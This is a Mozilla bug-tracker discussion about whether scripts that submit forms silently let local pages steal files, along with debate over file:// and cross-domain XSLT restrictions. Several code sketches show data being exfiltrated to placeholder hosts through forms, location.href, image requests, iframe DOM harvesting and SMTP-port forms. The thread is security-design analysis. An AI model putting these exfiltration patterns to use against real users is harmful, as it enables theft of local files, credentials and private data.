Closed Bug 258866 (opened 20 years ago, closed 20 years ago)

Javascript allows malicious file to silently upload arbitrary text / xml files via forms

Categories: (Core :: DOM: Core & HTML, defect)

Status: RESOLVED INVALID

People: (Reporter: bmills, Unassigned)

Attachments: (2 files)

User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3

See forthcoming proof-of-concept source file

Reproducible: Always
Steps to Reproduce:
View exploit page.  The iframe's contents can be an arbitrary file:// URL.  The
mode of deployment would probably be as an email attachment (opening the
document could, for example, trigger transmission of an address book file back
to a trojan-infected machine).
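
(Roughly, the page described behaves like this -- the file path and host name
below are placeholders, not the contents of the attached proof-of-concept:)

   // Page contains: <iframe id="secret" src="file:///path/to/some-local-file.xml"></iframe>
   //                <form action="http://hostile.example.org/collect" method="post">
   //                  <input type="hidden" name="payload"></form>
   window.onload = function () {
     var secret = document.getElementById('secret');
     // serialize whatever the local file contained
     var text = new XMLSerializer().serializeToString(secret.contentDocument);
     document.forms[0].elements['payload'].value = text;
     document.forms[0].submit();   // sent silently, with no user interaction
   };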



It seems to me that allowing non-interactive submission of form data is a
really, really bad way to go, security-wise.

The current hack of "don't allow pages to load certain files or access contents
of certain documents" can't possibly cover all the edges, and even if it does,
throwing that many extra checks in seems like an awful lot of overhead.

Plus, the fact that javascript can arbitrarily submit data at will causes other,
nastier hacks, like disabling remote XSLT -- a real pain for anyone trying to
use MathML.

The ability for forms to submit themselves will prevent Mozilla from ever
implementing external entities in DTDs (or at least from doing so safely), 
because an entity declaration in a DTD can provide a script with the contents of
an arbitrary file.  Entity declarations are extremely useful, and external
entity declarations are necessary for modular XML -- so it would seem imprudent
to rule out adding that capability safely in future versions of Mozilla.

I suggest implementing form-submission-protection in the same manner as
popup-blocking -- allow a whitelist, if need be, and show the "blocked" icon,
and allow actions as a result of user input, but for god's sake don't let pages
submit information without the user's knowledge!

(As an aside, it may be possible to use form auto-fill and auto-submission to
gather email addresses and/or credit card numbers -- yet another reason why an
unprotected submit function is a very bad idea, W3 or not.  I haven't
investigated this possibility.)
Attached file xhtml proof-of-concept
Only an exploit if opened locally, but nonetheless an exploit.
No browsers currently support external entities, but you don't really want to
force the XML-parsing folks to have to check origins of DTDs if they do
implement, do you?
Yes, we do, don't we?


I don't understand the exploit here:

> View exploit page.  The iframe's contents can be an arbitrary file:// URL. 

Only if the page itself is in the file:// world, which it won't be for any 
remote content. The user would have to explicitly save the file then open it, at 
which point it has the same security model as any local file.


> The mode of deployment would probably be as an email attachment (opening the
> document could, for example, trigger transmission of an address book file back
> to a trojan-infected machine).

E-mails are not given file:// URIs unless specifically saved to disk.


> It seems to me that allowing non-interactive submission of form data is a
> really, really bad way to go, security-wise.

It's used all over the place. It is also not the only way for scripts to cause 
data to be sent to a remote server -- you could do the same using location.href, 
using synthesised clicks on a link, using a meta refresh, using a dynamically 
created iframe, changing the src of an img, object or iframe, linking to a 
stylesheet, creating a stylesheet that uses a url() dynamically, etc etc etc.
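
(For illustration, a few of those channels side by side; the host name is
hypothetical and "stolen" stands for whatever the script has already read:)

   // Any one of these alone is enough; evil.example.org is a placeholder.
   var stolen = '...';                                                     // data already read
   new Image().src = 'http://evil.example.org/log?d=' + escape(stolen);    // img request
   var f = document.createElement('iframe');
   f.src = 'http://evil.example.org/log?d=' + escape(stolen);              // dynamic iframe
   document.body.appendChild(f);
   // or simply: location.href = 'http://evil.example.org/log?d=' + escape(stolen);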


> The current hack of "don't allow pages to load certain files or access
> contents of certain documents" can't possibly cover all the edges

Why not? Why is it a hack?


> and even if it does, throwing that many extra checks in seems like an awful 
> lot of overhead.

It's just one or two places, that are then reused whenever relevant.
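
(Conceptually -- this is only a sketch of the shape, not the actual Gecko code:)

   // One reusable policy routine that every load path calls.
   function scheme(uri) { return uri.substring(0, uri.indexOf(':')); }
   function checkLoadURI(sourceURI, targetURI) {
     if (scheme(targetURI) === 'file' && scheme(sourceURI) !== 'file')
       throw new Error('remote content may not load local files');
     // ... the other same-origin / restricted-scheme rules live here too ...
   }
   // frame loads, stylesheet loads, XSLT loads, etc. all funnel through checkLoadURI()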


> Plus, the fact that javascript can arbitrarily submit data at will causes 
> other, nastier hacks, like disabling remote XSLT -- a real pain for anyone 
> trying to use MathML.

Could you explain this case?


> The ability for forms to submit themselves will prevent Mozilla from ever
> implementing external entities in DTDs (or at least from doing so safely), 
> because an entity declaration in a DTD can provide a script with the contents 
> of an arbitrary file.

You can already do this using <script src=""> -- not a problem, since the same-
origin or restricted-scheme checks are done there already.


> Entity declarations are extremely useful, and external entity declarations are 
> necessary for modular XML -- so it would seem imprudent to make it safe to add 
> that capability to future versions of Mozilla.

Personally I would recommend against going that route. XInclude, XBL, and 
similar schemes fit better into the XML world IMHO. Entities are a holdover from 
the SGML world which didn't have namespaces, didn't do incremental rendering 
over slow links, didn't do scripting, etc.
> > The mode of deployment would probably be as an email attachment (opening the
> > document could, for example, trigger transmission of an address book file back
> > to a trojan-infected machine).
> 
> E-mails are not given file:// URIs unless specifically saved to disk.

That mainly depends on the mail client, but in my experience most clients save
attachments to disk and then open from a disk cache, which lies in the file://
world.

> > It seems to me that allowing non-interactive submission of form data is a
> > really, really bad way to go, security-wise.
> 
> It's used all over the place. It is also not the only way for scripts to cause 
> data to be sent to a remote server -- you could do the same using location.href, 
> using synthesised clicks on a link, using a meta refresh, using a dynamically 
> created iframe, changing the src of an img, object or iframe, linking to a 
> stylesheet, creating a stylesheet that uses a url() dynamically, etc etc etc.

Yes, it is the only way for scripts to cause data to be sent to a remote server,
which is why allowing it in response to user actions is perfectly acceptable.  I
don't know about you, but I really don't want my browser sending excess data to
foreign servers without my knowledge or consent.  Besides, if Mozilla is going
to verify on re-post, it may as well verify on silent-post.

> > The current hack of "don't allow pages to load certain files or access
> > contents of certain documents" can't possibly cover all the edges
> 
> Why not? Why is it a hack?

It's a hack because (a) it's not very well documented, so it comes as a surprise
to people who are authoring unusual HTML/XML documents who expect things in the
spec to work as the spec says, and because (b) it's covering a lot of peripheral
cases instead of the actual source of the problem, meaning that this approach is
prone to lots of little holes.

> > and even if it does, throwing that many extra checks in seems like an awful 
> > lot of overhead.
> 
> It's just one or two places, that are then reused whenever relevant.

"Whenever relevant" being during loading of frames, XSL documents, and DTDs? 
There's a principle of software design that says that if you don't use a
feature, you shouldn't have to pay any overhead for it -- in this case, HTML and
XML rendering both pay all the time for the fact that scripts have a
less-than-optimal security model.

> > Plus, the fact that javascript can arbitrarily submit data at will causes 
> > other, nastier hacks, like disabling remote XSLT -- a real pain for anyone 
> > trying to use MathML.
> 
> Could you explain this case?

Mozilla doesn't support XSLT files on servers other than the one hosting the
initial document.  It also doesn't support content MathML.  There's a convenient
content MathML-to-presentation MathML XSL document on w3.org, BUT that means
that with every MathML document I transmit I'm forced to include 5 additional
files to make it readable.  This is all because there's an outside chance
that someone might be able to use XSLT and scripting to transmit local XML files.

> > The ability for forms to submit themselves will prevent Mozilla from ever
> > implementing external entities in DTDs (or at least from doing so safely), 
> > because an entity declaration in a DTD can provide a script with the contents 
> > of an arbitrary file.
> 
> You can already do this using <script src=""> -- not a problem, since the same-
> origin or restricted-scheme checks are done there already.

Do the same-origin and restricted-scheme checks apply to DTD entities?  I was
under the impression that external entities hadn't even been implemented yet.

> > Entity declarations are extremely useful, and external entity declarations are 
> > necessary for modular XML -- so it would seem imprudent to make it safe to add 
> > that capability to future versions of Mozilla.
> 
> Personally I would recommend against going that route. XInclude, XBL, and 
> similar schemes fit better into the XML world IMHO. Entities are a holdover from 
> the SGML world which didn't have namespaces, didn't do incremental rendering 
> over slow links, didn't do scripting, etc.

Regardless of the presence of better alternatives, there are some XML
applications (modular XHTML 1.1, for one!) that make heavy use of external
entity declarations.  Ignoring major normative document-types just because you
don't want to fix scripting security doesn't seem like a very forward-looking
approach.
> > 
> > E-mails are not given file:// URIs unless specifically saved to disk.
> 
> That mainly depends on the mail client, but in my experience most clients save
> attachments to disk and then open from a disk cache, which lies in the file://
> world.

Granted, if you use a non-Mozilla mail client, it is possible that the page 
would later be opened in Mozilla using the file:// scheme. Does that mean we 
want to prevent file:// documents from accessing the network? Is there anything 
else file:// pages can do that http:// pages can't?


> > It is also not the only way for scripts to cause data to be sent to a
> > remote server -- you could do the same using location.href, [...]
> 
> Yes, it is the only way for scripts to cause data to be sent to a remote
> server

No, it isn't, that's my point.

Using your example, you could, e.g., change it to do:

   location.href = 'http://evil.example.org/?'
                      + escape(secretElt.contentDocument.body.innerHTML);

The same applies for dozens of other methods that result in the server being 
contacted with author-defined data.


> > > The current hack of "don't allow pages to load certain files or access
> > > contents of certain documents" can't possibly cover all the edges
> > 
> > Why not? Why is it a hack?
> 
> It's a hack because (a) it's not very well documented, so it comes as a
> surprise to people who are authoring unusual HTML/XML documents who expect 
> things in the spec to work as the spec says

The spec is broken; WHATWG (www.whatwg.org) should probably address this.


> and because (b) it's covering a lot of peripheral cases instead of the actual 
> source of the problem, meaning that this approach is prone to lots of little 
> holes.

The source of the problem is that http:// pages can access file:// pages, not 
that they can send arbitrary data to servers. Sending data happens all the time 
in Web pages. Thus, it is the hole that is filled.


> "Whenever relevant" being during loading of frames, XSL documents, and DTDs? 

And so forth, yes. Stylesheets, following links, backgrounds, etc.


> There's a principle of software design that says that if you don't use a
> feature, you shouldn't have to pay any overhead for it -- in this case, HTML
> and XML rendering both pay all the time for the fact that scripts have a
> less-than-optimal security model.

My understanding is that the "cost" is an insignificant part of page loading, 
but the only way to really look at this is using profiling tools.


> Mozilla doesn't support XSLT files on servers other than the one hosting the
> initial document.

Yes, this is a (quite important) security issue. If it allowed this, you could 
recreate various cross-domain cookie leaking bugs, etc.


> > You can already do this using <script src=""> -- not a problem, since the 
> > same-origin or restricted-scheme checks are done there already.
> 
> Do the same-origin and restricted-scheme checks apply to DTD entities?  I was
> under the impression that external entities hadn't even been implemented yet.

They haven't, but if they were, they probably would. It is unlikely that they 
will any time soon though.


> Regardless of the presence of better alternatives, there are some XML
> applications (modular XHTML 1.1, for one!) that make heavy use of external
> entity declarations.

You don't need to parse the DTD at all to make use of "modular XHTML 1.1". (The 
namespace is all you need to process such files.)


> Ignoring major normative document-types just because you don't want to fix 
> scripting security doesn't seem like a very forward-looking approach.

Unfortunately the alternative -- prompting the user every time script contacts 
an external host -- would get very annoying very quickly, with the result that 
users would just ignore the prompts, or allow any site to do anything, or, 
worse, use another browser.

The file:// restriction mechanism is well-understood and implemented in all 
browsers, doesn't interfere with regular Web pages' operations, and doesn't 
prompt the user. I don't understand why it is a problem, except for the case 
where local file://s can contact remote hosts, which might indeed need to be 
addressed.
Would someone mind restating the bug for me? Sounds like initially it was "don't
let js submit forms", but that's a WONTFIX -- too much of the real-world web
relies on that and if we blocked it people would simply switch to a "non-broken"
browser rather than thank us for making them more secure.

As hixie points out, it's not form submission that's the issue, it's scripting.
Turning off scripting is even more of a non-starter for an end-user browser,
though for people willing to live with the inconveniences it mostly works.
The problem isn't the fact that javascript can submit forms -- the problem is
that it can do so (a) silently, and (b) without any interaction from the user.

I'm suggesting a javascript-transmission-blocker based on the same algorithm as
the javascript-popup-blocker already in the system -- let trusted sites do it
all the time, let user-actions trigger it, and make it easy to tell when it happens.
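
(To make that concrete, the decision logic I have in mind is roughly the
following; the names are made up, and this is a sketch of the policy, not an
implementation:)

   // Sketch of the proposed policy, mirroring the popup blocker.
   var transmitWhitelist = ['w3.org'];                         // user-managed, like the popup whitelist
   function mayTransmit(originHost, triggeredByUserEvent) {
     for (var i = 0; i < transmitWhitelist.length; i++)
       if (transmitWhitelist[i] === originHost) return true;   // trusted sites: always allowed
     if (triggeredByUserEvent) return true;                     // clicks, onchange, etc.: allowed
     // otherwise: block the send and show a "blocked" icon, like the popup blocker does
     return false;
   }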

The number of real-world sites that use Javascript for form submission is quite
high; however, the number of legitimate real-world sites that use Javascript to
submit forms silently without any user interaction is extraordinarily small.

I'm not suggesting turning scripting off -- that's obviously not feasible.  I'm
just suggesting doing scripting security in the scripting engine rather than
pushing it off on every other browser component.
(In reply to comment #5)
> > and because (b) it's covering a lot of peripheral cases instead of the actual 
> > source of the problem, meaning that this approach is prone to lots of little 
> > holes.
> 
> The source of the problem is that http:// pages can access file:// pages, not 
> that they can send arbitrary data to servers. Sending data happens all the time 
> in Web pages. Thus, it is the hole that is filled.

Yes, and it would be perfectly reasonable, IMO, to prevent http:// pages from
accessing file:// pages (*with* the option to explicitly allow when blocked!);
but there's also this additional nonsense where file:// pages can't access
http:// pages, and http:// pages can't access other http:// pages -- far less
clear-cut than you make it sound. 
 
> > "Whenever relevant" being during loading of frames, XSL documents, and DTDs? 
> 
> And so forth, yes. Stylesheets, following links, backgrounds, etc.

That's an awful lot of cases to cover, with no guarantee that you're not
forgetting one.  It would be much safer to stop the problem at the source.

> > There's a principle of software design that says that if you don't use a
> > feature, you shouldn't have to pay any overhead for it -- in this case, HTML
> > and XML rendering both pay all the time for the fact that scripts have a
> > less-than-optimal security model.
> 
> My understanding is that the "cost" is an insignificant part of page loading, 
> but the only way to really look at this is using profiling tools.

I'm not talking about cost in terms of CPU load.  I'm talking about cost in
terms of unnecessary restrictions, additional cases to check, and 5x as many
documents having to be passed around to render the same document.  Cost in
real-world frustrations for users like me who don't want to have to tarball
their markup with five readily-available stylesheets just to make it render the
way it's specified. 

> > Mozilla doesn't support XSLT files on servers other than the one hosting the
> > initial document.
> 
> Yes, this is a (quite important) security issue. If it allowed this, you could 
> recreate various cross-domain cookie leaking bugs, etc.

It's interesting that you should say that, because I've read both of the public
bugs that address cross-domain XSLT, and not once was cookie-spoofing mentioned.
 I've searched for quite some time for any and all instances of XSL exploits of
any sort, and have yet to see so much as a proof-of-concept.  All I've seen
mentioned anywhere is "IE does it, so we should, too" -- and as far as I'm
concerned, the behavior of IE WRT security and functionality isn't a very
good goal.

> > Regardless of the presence of better alternatives, there are some XML
> > applications (modular XHTML 1.1, for one!) that make heavy use of external
> > entity declarations.
> 
> You don't need to parse the DTD at all to make use of "modular XHTML 1.1". (The 
> namespace is all you need to process such files.)

But you do need to parse the DTD to get the right entity references, and there
are a lot of cases where entity references are specified in old SGML documents
that really need DTD entities.

> > Ignoring major normative document-types just because you don't want to fix 
> > scripting security doesn't seem like a very forward-looking approach.
> 
> Unfortunately the alternative -- prompting the user every time script contacts 
> an external host -- would get very annoying very quickly, with the result that 
> users would just ignore the prompts, or allow any site to do anything, or, 
> worse, use another browser.

I don't think that is the alternative.  I think the alternative is prompting
the user every time an untrusted script contacts an external host *without being
told to*.  The number of legitimate cases that would satisfy those conditions is
extremely small.

> The file:// restriction mechanism is well-understood and implemented in all 
> browsers, doesn't interfere with regular Web pages' operations, and doesn't 
> prompt the user. I don't understand why it is a problem, except for the case 
> where local file://s can contact remote hosts, which might indeed need to be 
> addressed.

The file:// restriction mechanism causes serious issues, especially for people
like me who are trying to use non-HTML XML markup -- which is going to be far
more common in the future.  Not to mention, it creates the potential for massive
security holes as soon as someone forgets to add a check in some new module that
doesn't have a thing to do with scripting.
> 
> Yes, and it would be perfectly reasonable, IMO, to prevent http:// pages from
> accessing file:// pages (*with* the option to explicitly allow when blocked!);
> but there's also this additional nonsense where file:// pages can't access
> http:// pages, and http:// pages can't access other http:// pages -- far less
> clear-cut than you make it sound. 

All of these restrictions are for specific reasons (such as remote sites not 
contacting unprotected intranet sites, remote sites not cookie-stealing from 
other remote sites, remote sites not using the UA to send messages to SMTP 
ports, etc, etc, etc).


> That's an awful lot of cases to cover, with no guarantee that you're not
> forgetting one.  It would be much safer to stop the problem at the source.

We disagree on what "the source" is. But if you mean that it would be better to 
stop scripts from automatically contacting other sites by prompting the user 
when a script does so, rather than stop scripts from contacting other sites by 
simply blocking it when it tries to do a dangerous access, then I don't 
understand why it would be safer. You have to put the checks in all the same 
places, except now instead of just blocking the dangerous cases, you rely on the 
user knowing which are dangerous, and on the user not making any mistakes.

Which is more likely: one of a few hundred professional Web Browser engineers 
making a mistake, or one of a few hundred million newbies making a mistake?


> I'm not talking about cost in terms of CPU load.  I'm talking about cost in
> terms of unnecessary restrictions

They're not unnecessary, IMHO. Which case would you say should be allowed but 
isn't?


> additional cases to check

No, you'd have to check the same number of places.


> and 5x as many documents having to be passed around to render the same
> document.

Instead of prompting the user for 5 times as many documents, causing the user to 
become apathetic to the issue and allow hostile code to run.


>> Yes, this is a (quite important) security issue. If it allowed this, you 
>> could recreate various cross-domain cookie leaking bugs, etc.
> 
> It's interesting that you should say that, because I've read both of the 
> public bugs that address cross-domain XSLT, and not once was cookie-spoofing 
> mentioned.

Cookie-spoofing and intranet-snooping are the reasons why cross-domain accesses 
are blocked.


> I've searched for quite some time for any and all instances of XSL exploits of
> any sort, and have yet to see so much as a proof-of-concept.

That would be because it's blocked, and so not possible.


>> You don't need to parse the DTD at all to make use of "modular XHTML 1.1". 
>> (The namespace is all you need to process such files.)
> 
> But you do need to parse the DTD to get the right entity references, and there
> are a lot of cases where entity references are specified in old SGML documents
> that really need DTD entities.

SGML isn't supported by UAs. XML UAs aren't required to read DTDs. When authors 
send markup over the wire, they should do so using only widely standardised 
markup languages (MathML, XHTML, SVG for graphics).

So, when you convert your SGML files to XHTML+MathML+SVG, simply substitute the 
entities in at the same time.
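
(For what it's worth, that substitution step is mechanical; a sketch, with a
made-up entity table -- use whatever your DTD actually defines:)

   // Replace named entity references with their characters during conversion.
   var ENTITIES = { alpha: '\u03B1', eacute: '\u00E9', nbsp: '\u00A0' };   // example table only
   function substituteEntities(text) {
     return text.replace(/&([A-Za-z][A-Za-z0-9]*);/g, function (match, name) {
       return ENTITIES.hasOwnProperty(name) ? ENTITIES[name] : match;      // leave unknown refs alone
     });
   }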


> I think the alternative is prompting the user every time an untrusted script 
> contacts an external host *without being told to*.  The number of legitimate 
> cases that would satisfy those conditions is extremely small.

Wrong. The number of cases that this would satisfy is very high indeed.

For example, any site that does:

   onclick="location.href=..."

All the sites that use <select> elements for navigation.

All the sites that use location.href="" for redirects.

All the JavaScript games and applications that communicate with the remote 
server (e.g. GMail, www.voidwars.com, etc).

Any page with a form that targets an IFrame.

Any page with a form that targets a non-HTTP port.

All your MathML pages when they switch to using remote XSLT.

EVERY single one of these would prompt the user. I know _I_ would get annoyed 
very quickly; I can only imagine how annoying it would be for users and how 
quickly they would become desensitised to it.


> The file:// restriction mechanism causes serious issues, especially for people
> like me who are trying to use non-HTML XML markup -- which is going to be far
> more common in the future.

The only issue I'm aware of is the XSLT cross-site issue, and that's trivially 
worked around by simply copying the files onto the new host (which is a good 
thing anyway since otherwise the original host could get overwhelmed). How is 
the file:// restriction causing you serious issues?

(If the Content MathML stylesheet is good, by the way, you might want to look 
into whether Mozilla might want to port it to C++ and effectively use it 
internally to implement Content MathML.)


> Not to mention, it creates the potential for massive security holes as soon as 
> someone forgets to add a check in some new module that doesn't have a thing to 
> do with scripting.

The same checks would be required in your model.
(In reply to comment #9)
> > I'm not talking about cost in terms of CPU load.  I'm talking about cost in
> > terms of unnecessary restrictions
> 
> They're not unnecessary, IMHO. Which case would you say should be allowed but 
> isn't?

I'm not saying that security checks aren't necessary.  I'm saying that they'd be
better done on the script side instead of the document side.

> > and 5x as many documents having to be passed around to render the same
> > document.
> 
> Instead of prompting the user for 5 times as many documents, causing the user to 
> become apathetic to the issue and allow hostile code to run.

Not necessarily.  Most users are never prompted by the popup-blocking system,
which appears to use a very similar algorithm to what I'm proposing.

I'm *not* saying that the user should be prompted every time a script transmits
data.  I *am* saying that a user should be prompted every time an untrusted
script transmits data when it isn't responding to a UI event.  I'm just talking
about things like onload events and non-function-declarations in script tags --
the sort of thing that results from a cross-site-scripting attack from the
server side.

> >> Yes, this is a (quite important) security issue. If it allowed this, you 
> >> could recreate various cross-domain cookie leaking bugs, etc.
> > 
> > It's interesting that you should say that, because I've read both of the 
> > public bugs that address cross-domain XSLT, and not once was cookie-spoofing 
> > mentioned.
> 
> Cookie-spoofing and intranet-snooping are the reasons why cross-domain accesses 
> are blocked.

Yes, but cross-domain accesses don't block the results of server-end cross-site
scripting attacks, so users are still just as vulnerable.  The problem isn't
solved, it's just moved to a codebase we have no control over, and personally I
think moving a problem to where you can't fix it is not an acceptable solution.

> > I've searched for quite some time for any and all instances of XSL exploits of
> > any sort, and have yet to see so much as a proof-of-concept.
> 
> That would be because it's blocked, and so not possible.

No, I mean I have yet to see any document stating the reason for it being
blocked in any terms other than "Microsoft does it".  Nowhere have I seen any
documents detailing how XSL could be used for any sort of client-side exploit,
even in theoretical terms.

> Wrong. The number of cases that this would satisfy is very high indeed.
> 
> For example, any site that does:
> 
>    onclick="location.href=..."

That's in response to a UI event, so it wouldn't be blocked.

> All the sites that use <select> elements for navigation.

I consider onchange to be a UI event also.  Not blocked in this case.

> All the sites that use location.href="" for redirects.

Should absolutely not be doing that anyway.  It breaks "back" button support. 
Even so, I think in that case prompting the user wouldn't be that annoying --
most sites that use HTML redirects use meta tags anyway.

> All the JavaScript games and applications that communicate with the remote 
> server (e.g. GMail, www.voidwars.com, etc).

Whitelisting?  Also, JavaScript games and applications generally communicate in
response to UI events.

> Any page with a form that targets an IFrame.

You'll have to explain this case to me.  I don't know what bearing it has on
execution of autonomous scripts.

> Any page with a form that targets a non-HTTP port.

Again, I don't see the connection.

> All your MathML pages when they switch to using remote XSLT.

I'm still not convinced that remote XSLT has any potential for vulnerabilities.
 If you could provide a link to an example or a proof-of-concept or even a
theoretical discussion of a possible attack...

Also, I would whitelist W3C, so it would just be one prompt if any.

> EVERY single one of these would prompt the user. I know _I_ would get annoyed 
> very quickly; I can only imagine how annoying it would be for users and how 
> quickly they would become desensitised to it.

One case would prompt the user, once.  I'd be much less annoyed that way than
having to tarball 5 XSLs with my document.  I'd also be happier that I'd be
protected against cross-site attacks.  I don't know about you, but theft by
fraud is pretty annoying to me.
 
> > The file:// restriction mechanism causes serious issues, especially for people
> > like me who are trying to use non-HTML XML markup -- which is going to be far
> > more common in the future.
> 
> The only issue I'm aware of is the XSLT cross-site issue, and that's trivially 
> worked around by simply copying the files onto the new host (which is a good 
> thing anyway since otherwise the original host could get overwhelmed).

It's not a trivial workaround when the document doesn't fit your "all HTML is
served on a website" paradigm.  A lot of the document markup I'm doing these
days consists of documents to be sent to colleagues via email, so the added
steps of either printing to PDF or packaging XSL files cause quite a bit of
overhead.

> How is 
> the file:// restriction causing you serious issues?

Because I'm trying not to have a dozen copies of the same stylesheet sitting
around on my drive.  I'd like to be able to at least serve the stylesheets from
localhost, but I can't even do that.

> (If the Content MathML stylesheet is good, by the way, you might want to look 
> into whether Mozilla might want to port it to C++ and effectively use it 
> internally to implement Content MathML.)

I'd say that using XSL to support Content MathML is actually the better plan --
that way any extensions or improvements in newer versions will be supported
automatically as soon as the stylesheet is updated.

> > Not to mention, it creates the potential for massive security holes as soon as 
> > someone forgets to add a check in some new module that doesn't have a thing to 
> > do with scripting.
> 
> The same checks would be required in your model.

Yes, but they'd be required in vastly different places -- and they'd cut down on
the possibility of compromised servers being used for cross-site script
injection attacks.
> ...cross-domain accesses don't block the results of server-end cross-site
> scripting attacks, so users are still just as vulnerable.

A hostile server contacting a third party site cannot harm the user.
A page from a hostile server contacting a third-party site from the client can harm 
the user: by stealing bandwidth, by using the user's credentials (through cookies or 
logged-in HTTP authentication), and by contacting hosts that are accessible to the 
user but not to the hostile server.

If a hostile server could attack a third-party site in such a way as to harm the 
user, the user wouldn't have to visit the hostile site in the first place, and 
there would not be any user agent security problem to speak of. (And that would 
thus be out of scope for this discussion.)


> No, I mean I have yet to see any document stating the reason for it being
> blocked in any terms other than "Microsoft does it".  Nowhere have I seen any
> documents detailing how XSL could be used for any sort of client-side exploit,
> even in theoretical terms.

It's the same methods as any other system:

1. Cookie exploit: if an XSLT sheet is returned differently based on the user's 
cookie-based credentials, then a hostile site can infer details from the XSLT 
sheet by applying the sheet to carefully-crafted documents.

2. Intranet snooping exploit: if an XSLT sheet is inside an intranet, only 
accessible to the user, a hostile site can effectively reverse engineer the 
stylesheet by leading the user to a page and applying the transformation sheet 
to numerous inputs in sequence and observing the results while the user is 
visiting the hostile page.
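
(If cross-domain loading were permitted, the probing in 1 and 2 would look
roughly like this from the hostile page; the URLs are placeholders, and this is
precisely the access the current restriction refuses:)

   // Hypothetical: only works if cross-domain XSLT loading were allowed.
   var req = new XMLHttpRequest();
   req.open('GET', 'http://intranet.example.com/private/report.xsl', false);  // goes out with the user's credentials
   req.send(null);
   var sheet = req.responseXML;                        // assuming the sheet is served as XML

   var probe = new DOMParser().parseFromString('<report><row id="guess1"/></report>', 'text/xml');
   var proc = new XSLTProcessor();
   proc.importStylesheet(sheet);
   var output = proc.transformToDocument(probe);       // observe how the private sheet reacts
   // repeat with many crafted inputs, shipping each result back:
   new Image().src = 'http://hostile.example.org/log?r=' +
                     escape(new XMLSerializer().serializeToString(output));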


> > For example, any site that does:
> > 
> >    onclick="location.href=..."
> 
> That's in response to a UI event, so it wouldn't be blocked.

That would be a security hole. It is trivial to trick users into clicking. For 
example, the hostile page could be a game requiring clicking. Or it could be an 
innocent-looking page with many links, one of which just happens to be hostile.


>> All the sites that use <select> elements for navigation.
> 
> I consider onchange to be a UI event also.  Not blocked in this case.

I would not feel safe using a browser that let any page with select-based 
navigation have full access to my hard drive, local network, and third party 
sites (such as my bank), etc.


> > All the sites that use location.href="" for redirects.
> 
> Should absolutely not be doing that anyway.

That's largely irrelevant, there are millions of sites that do it and we can't 
afford to break them -- if we did, we would lose what little market share we had 
rather quickly.


>> Any page with a form that targets an IFrame.
> 
> You'll have to explain this case to me.  I don't know what bearing it has on
> execution of autonomous scripts.

It is easy to trick users into clicking buttons. If you get a form to target an 
iframe, then you can make that form fetch the content of a third party site
(e.g. a bank) and then have the hostile page walk the DOM of this site to take 
out of it whatever information it might want.
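
(Concretely, the sort of thing such a page would try; the bank host and field
layout are placeholders, and it is exactly this read that the same-origin check
refuses today:)

   // Page contains: <form action="https://bank.example.org/statement" target="loot"> ...
   //                <iframe name="loot" onload="harvest()" style="visibility: hidden">
   function harvest() {
     var doc = window.frames['loot'].document;          // the cross-origin read blocked today
     var cells = doc.getElementsByTagName('td');        // DOM 1 Core -- no innerHTML needed
     var text = '';
     for (var i = 0; i < cells.length; i++)
       text += (cells[i].firstChild ? cells[i].firstChild.nodeValue : '') + '\n';
     new Image().src = 'http://hostile.example.org/log?d=' + escape(text);
   }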


> > Any page with a form that targets a non-HTTP port.
> 
> Again, I don't see the connection.

There have been exploits where (non-scripted, I believe) pages tricked users 
into submitting forms that actually targetted SMTP servers with carefully 
crafted content, such as to cause the servers to send e-mail (spam) on behalf of 
the user.
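
(For reference, roughly the shape of that trick, sketched with script for
brevity -- the pages in question reportedly used plain markup; the host is a
placeholder, and browsers now refuse submissions to port 25 and most other
non-HTTP ports for exactly this reason:)

   // Historical sketch only; such submissions are blocked by the port restrictions.
   var f = document.createElement('form');
   f.action  = 'http://mail.internal.example:25/';   // an SMTP server the victim can reach
   f.method  = 'post';
   f.enctype = 'text/plain';                          // body goes over the wire nearly verbatim
   var t = document.createElement('textarea');
   t.name  = 'X';                                     // name=value lines are crafted so that the
   t.value = '\nHELO example.org\n...';               // mail server reads them as SMTP commands
   f.appendChild(t);
   document.body.appendChild(f);
   // one tricked click on the form's submit button delivers the message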


> Also, I would whitelist W3C, so it would just be one prompt if any.

Whitelisting doesn't work when the whitelisted site is compromised and becomes a 
hostile site (as happened recently with an IIS exploit -- IE users suddenly 
found themselves attacked by what were previously considered trusted sites).


> One case would prompt the user, once.  I'd be much less annoyed that way than
> having to tarball 5 XSLs with my document.

As a user, I would be a lot _less_ annoyed if I had no prompts and you had to 
copy some XSLT files, than if I had a prompt and you could just use W3C 
bandwidth instead of your own.


> I'd also be happier that I'd be protected against cross-site attacks.

I hope I have explained why in fact you would be less protected than in the 
current system (which simply blocks all such attempts rather than only blocking 
those that didn't originate from user clicks).


> > The only issue I'm aware of is the XSLT cross-site issue, and that's 
> > trivially worked around by simply copying the files onto the new host (which 
> > is a good thing anyway since otherwise the original host could get 
> > overwhelmed).
> 
> It's not a trivial workaround when the document doesn't fit your "all HTML is
> served on a website" paradigm.  A lot of the document markup I'm doing these
> days consists of documents to be sent to colleagues via email, so the added
> steps of either printing to PDF or packaging XSL files cause quite a bit of
> overhead.

Personally as a user I hate receiving attachments and would recommend just 
putting the files on a server and e-mailing the URIs.


> > How is the file:// restriction causing you serious issues?
> 
> Because I'm trying not to have a dozen copies of the same stylesheet sitting
> around on my drive.  I'd like to be able to at least serve the stylesheets
> from localhost, but I can't even do that.

I don't understand how any of this relates to file:// URIs being non-accessible 
from http:// URIs. Could you expand on exactly what your use case is?


> > (If the Content MathML stylesheet is good, by the way, you might want to 
> > look into whether Mozilla might want to port it to C++ and effectively use 
> > it internally to implement Content MathML.)
> 
> I'd say that using XSL to support Content MathML is actually the better plan
> -- that way any extensions or improvements in newer versions will be supported
> automatically as soon as the stylesheet is updated.

Unfortunately XSLT cannot handle dynamic DOM updates and is therefore not 
appropriate as a long-term solution.


> > The same checks would be required in your model.
> 
> Yes, but they'd be required in vastly different places -- and they'd cut down 
> on the possibility of compromised servers being used for cross-site script
> injection attacks.

Actually unless I really don't understand your proposal, the checks would be 
needed in exactly the same places.
(In reply to comment #11)
I'm not talking about hostile servers attacking a third-party site.  I'm talking
about the well-known procedure of cross-site scripting, by which one server
provides a URL to a second (trusted) server, and the trusted server injects a
script fragment from the URL into the document it produces.  This can be used
for session hijacking, and all it requires is document.cookie and location.href.
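
(The injected fragment in that scenario is typically no more than the following;
the host name is a placeholder:)

   // The script fragment reflected into the trusted page by the vulnerable server:
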